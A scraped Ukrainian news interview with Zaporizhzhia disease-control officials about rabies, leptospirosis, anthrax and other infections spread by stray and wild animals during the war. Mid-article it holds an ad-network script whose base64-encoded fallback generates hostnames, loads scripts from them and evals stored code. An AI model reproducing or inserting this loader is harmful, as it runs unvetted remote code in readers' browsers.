Проблема безпритульних тварин на Запоріжжі: як не заразитися

Через повномасштабну війну та дії окупанта зросла кількість безпритульних тварин, а також їхній контакт зі свійськими та дикими. Це відповідно привело до збільшення кількості захворювань, які передаються через укуси, подряпини, обслинення тварин людям. Зокрема неможливо зараз провести відповідні щеплення, діагностику та аналіз стану тварин як домашніх, свійських, так і безпритульних, диких, а також могильників худоби на тимчасово окупованих територіях. Як вберегтися людям від можливого інфікування — розповів Олександр Мащак, заступник гендиректора з дослідження біологічних факторів Запорізького обласного центру контролю та профілактики хвороб в інтерв’ю Маргариті Галіч.

Чи взагалі можлива передача інфекційних хвороб від тварин до людей?

Олександр Мащак, заступник гендиректора з дослідження біологічних факторів, надасть відповіді на деякі питання з приводу цього.

«Існує навіть окремий клас інфекційних захворювань, який має назву — ‘зоонтропонози’, це саме ті небезпечні захворювання, які передаються виключно від тварин до людей. В ці складні часи ризики захворювання інфекційним захворюванням значно зростають, це зумовлено, перш за все, військовим часом в якому ми усі проживаємо. Перша інфекція про яку ми будемо говорити це -‘сказ’. Це складна вірусна інфекція якій вже сотня років, але на жаль ще досі не винайшли ліки котрі можуть вилікувати людину яка захворіла. Тобто, якщо людина захворіє на сказ — вона 100% гине. Передається цей вірус виключно від тварин до людей, тобто під час покусів може передаватися інфекційний початок і за певних обставин людина може захворіти».

«Власники домашніх тварин мають пам’ятати, що тварині потрібно робити своєчасне щеплення від сказу, щоб тварина не могла перейняти інфекцію від інших тварин. Треба обмежити свою тварину від контактів з іншими, особливо з бродячими, вуличними. Також треба контролювати наших дітей, котрі люблять погратися з ними. Наразі це треба скоротити. На минулому тижні стався неприємний випадок коли дитина значно постраждала від багатьох укусів тварини, собаки. За 7 місяців поточного року на підконтрольній території Запорізької області більш ніж 700 випадків покусів людей тваринами і, скажемо, якщо це відбулося — треба своєчасно звернутися до лікаря».

Наталія Дорошева, лікарка кардіореанімаційної бригади, розповість про дії при покусах тваринами.

«Першочергово треба обмивати рану мильною проточною водою не менше 15 хвилин, потім обробити антисептиком, вміст спирту якого не менше 70%. Людина повинна звернутися до  свого сімейного лікаря і лабораторного центра, адже є певний графік роблення щеплень і чим раніше його зробити — тим краще, бажано не пізніше 14 діб від моменту укусу чи подряпин. Зокрема, хочу звернути увагу громадян, на те що їжаки також можуть передавати інфекції, треба зменшити контакт з ними».

«При враженні буде призначене, так зване, антирабічне лікування. Тобто існує вакцина проти сказу. Це лікування проводиться неодноразово, в залежності від препарату проводиться декілька щеплень, ці щеплення зможуть на 100% застерегти від ураження сказом. Тому якщо ви постраждали від укусу тварин треба вчасно звернутися в лікарню, а саме антирабічний кабінет з метою надання лікування. Також за 7 місяців поточного року у Запорізькій області 239 осіб отримали дане лікування».

Чи можна робити щеплення домашній тварині від сказу?

«Так, цим займається ветеринарна служба, але внаслідок бойових дій ці заходи в Запорізькій області фактично не проводяться.»

Чи варто приручати зараз диких тварин?

«Дуже не рекомендуємо вступати в контакт з дикими тваринами, треба пам’ятати про те що, дикі тварини є переносниками більш ніж 100 інфекційних захворювань».

Які ще є небезпечні інфекційні захворювання?

«Лептоспіроз. Це дуже небезпечна гостра інфекційна хвороба, яка швидко розвивається, вражає печінку та нирки. Її переносниками можуть бути різноманітні пацюки, миші. Зараження відбувається під час забруднення сечею харчових або промислових продуктів, води та водоймищ. На цьому тижні був випадок коли людина займалась рибалкою в одній з водоймищ Запорізької області й захворіла. Наразі знаходиться в важкому стані в обласній лікарні. Наразі не існує безпечних місць в Запорізькій області для купання або усіх інших видів діяльностей біля водойм. Вже є декілька офіційних випадків захворювання лептоспірозом від початку 2023 року».

Як людина може застерегти себе від ураження даної інфекції?

«Специфічного захисту від цього немає, тільки обмеженням своєї поведінки та бажань можна застерегтись від лептоспірозу».

Які перші прояви лептоспірозу?

«Перші прояви схожі на звичайну застуду, а саме висока температура. Потім відбувається враження печінки». var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Токсоплазмоз. Чи реєструються випадки?

«Токсоплазмоз — це паразитарна інфекція, вона специфічна для тих, хто полюбляє котів, але вона небезпечна лише для дітей раннього віку, малюків. У наслідку можуть бути ураження зору та прояви неврозу».

Як людині зрозуміти, що та інфікована?

«Виключно лабораторна діагностика»

«Запорізька область на жаль багата на інфекційні захворювання, таких як туляремія та сибірка. Гризунів стає більше, вони ідуть до людей, заходи котрі проводились раніше наразі не проводяться, після деокупації ми розуміємо, що буде велика кількість роботи, щодо профілактики туляремії та сибірки. Але на підконтрольних територіях ризики передачі такої інфекції — відсутні. Ми контролюємо цей процес, контролюємо дотримання стану скотомогильників на нашій території, всі ризики фактично відсутні».

Які прояви у людини від ураження туляримією чи сибіркою?

«При туляремії — дуже гострий початок, велика температура, можливе запалення легенів. При сибірці — виникають великі виразки які не лікуються й людині дуже складно надалі функціонувати з цим. Випадків на сибірку не було зареєстровано, але потрібно розуміти, що скотомогильники де заховані тварини які загиблі від сибірки є небезпечними.  Збудник сибірки ‘живе’ декілька сотень років».

Як тварина може інфікуватись?

«Під час покусів іншою твариною, під час поїдання фекалій зараженої тварини, під час контакту з іншою твариною».

«Наразі ми знаходимось у сучасній вірусологічній лабораторії нашого закладу і застосування цієї складної сучасної апаратури впродовж декількох годин проводиться повністю діагностика таких інфекцій як: ботуліфм, лептоспіроз, туляремія, коронавірусної хвороби. Діагностика займає близько 4 годин».

Після деокупації чи буде проходити перевірка на стан скотомогильників та саме тварин?

«Так, буде проводитись аналіз стану грунту, скоту та скотомогильників».

Чи можна людині уразитись гельмінтами від свійських або домашніх тварин?

«Більша частина гельмінтів передається саме від тварин. Гельмінти котрі передаються від людини до людини — їх всього 2-3, не більше. Більша частина передається від тварин».

Як застерегтись від усіх цих інфекцій?

«Головне правило це уникати контактів з незнайомими тваринами. Якщо ви власник тварини — приймати заходи щодо обмеження контакту вашої тварини з іншою. Проводити своєчасне щеплення тваринам та собі самому. Провести профілактичну бесіду з дітьми, щодо контакту з вуличними тваринами. При виникненні небезпечної ситуації, а саме покусах твариною, своєчасно відвідати лікарню».

Джерело — Суспільне. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/problema-bezpritulnih-tvarin-na-zaporizhzhi-yak-ne-zarazitisya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top